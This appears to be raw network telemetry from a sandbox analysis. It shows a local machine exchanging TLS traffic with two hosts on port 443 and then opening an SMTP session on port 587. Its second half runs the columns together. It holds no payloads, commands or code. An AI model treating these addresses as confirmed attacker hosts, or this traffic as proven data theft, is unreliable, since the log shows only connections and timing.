Nov 12, 2024 15:55:03.350744009 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.350789070 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.350795984 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.350831032 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.351063967 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.351082087 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.351124048 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.351130009 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.351160049 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.354710102 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.354723930 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.354782104 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.354788065 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.354824066 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.355058908 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.355073929 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.355123043 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.355129957 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.355170012 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.355652094 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.355667114 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.355709076 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.355715036 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.355751038 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356048107 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356062889 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356095076 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356101036 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356127024 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356143951 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356635094 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356648922 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356684923 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356690884 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356709957 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356713057 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356726885 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356731892 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356751919 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356756926 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356779099 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356784105 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.356808901 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.356832027 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.357106924 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.357121944 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.357158899 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.357165098 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.357197046 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.357423067 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.357438087 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.357462883 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.357467890 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.357491016 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.357505083 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.358092070 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.358112097 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.358134985 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.358139992 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.358166933 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.358181953 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.358448029 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.358460903 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.358484983 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.358491898 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.358514071 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.358529091 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.359215021 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.359229088 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.359276056 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.359282970 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.359318972 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360109091 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360122919 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360172033 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360177994 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360218048 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360419035 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360431910 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360466003 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360474110 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360495090 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360521078 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360586882 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360600948 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360641003 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360647917 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360682011 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360846996 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360865116 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360896111 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360902071 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.360925913 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.360939980 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.361546993 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.361565113 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.361618042 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.361624002 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.361653090 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.361768961 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.361783028 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.361849070 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.361856937 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.361906052 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.362344027 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.362358093 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.362407923 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.362416029 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.362463951 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.362798929 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.362842083 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.362852097 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.362859011 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.362884045 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.362898111 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.363228083 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.363241911 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.363265991 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.363270998 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.363297939 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.363318920 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.462730885 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.462760925 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.462815046 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.462851048 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.462888956 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.462888956 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.464342117 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.464356899 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.464396000 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.464411974 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.464426041 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.464445114 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.464845896 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.464860916 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.464909077 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.464920044 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.464953899 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.465239048 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.465254068 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.465298891 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.465306997 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.465342045 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.466202974 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.466227055 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.466270924 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.466281891 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.466320038 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.466552973 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.466567039 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.466608047 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.466615915 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.466650009 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.470180035 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.470206022 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.470247984 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.470263958 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.470278978 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.470298052 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.470535994 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.470550060 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.470594883 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.470604897 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.470638990 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.470988989 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471003056 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471035957 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.471046925 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471062899 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.471079111 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.471345901 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471363068 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471400023 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.471409082 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471440077 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.471456051 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.471805096 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471820116 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471867085 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.471874952 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.471910000 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.472253084 CET  443          49710      198.252.105.91  192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472266912 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472313881 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.472321987 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472357988 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.472496986 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472512960 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472552061 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.472558022 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472599983 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473006964 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473021030 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473071098 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473078966 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473113060 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473170042 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473184109 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473226070 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473232985 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473262072 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473714113 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473728895 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473773956 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473781109 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473814011 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.474170923 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.474184990 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.474217892 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.474225044 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.474258900 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476116896 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476133108 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476176023 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476190090 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476224899 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476233006 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476247072 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476281881 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476289034 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476320028 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476366997 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476382971 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476408005 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476413965 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476428986 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476443052 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476448059 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476459026 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476490974 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476490021 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476501942 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476531982 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476556063 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476568937 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476618052 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476624966 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476659060 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476938009 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476952076 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476994038 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.477001905 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.477035046 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.477382898 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.477397919 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.477432966 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.477440119 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.477475882 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478013992 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478033066 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478075981 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478089094 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478125095 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478213072 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478226900 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478274107 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478281021 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478317976 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478650093 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478671074 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478696108 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478705883 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478719950 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478733063 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578474998 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578505039 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578583002 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578612089 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578634024 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578655958 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578741074 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578762054 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578811884 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578819990 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578862906 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.580391884 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580410004 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580471039 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.580481052 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580518961 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.580817938 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580832005 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580882072 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.580892086 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580930948 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.581734896 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581749916 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581820965 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.581830025 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581871033 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.581880093 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581928015 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.581934929 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581954956 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581974983 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.582003117 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.584209919 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.584224939 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.584237099 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.584243059 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:09.856647015 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:09.856700897 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:09.856776953 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:09.869324923 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:09.869349003 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.493155956 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.493240118 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:10.495325089 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:10.495331049 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.495564938 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.570662022 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:10.615330935 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.757848024 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.757951975 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.758063078 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:10.764672995 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:12.932401896 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:12.937390089 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:12.937474966 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.193897009 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.194489002 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.194719076 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.194804907 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.194806099 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.322037935 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.326778889 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.566231012 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.566481113 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.571322918 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.810122013 CET5874971451.195.88.199192.168.2.6
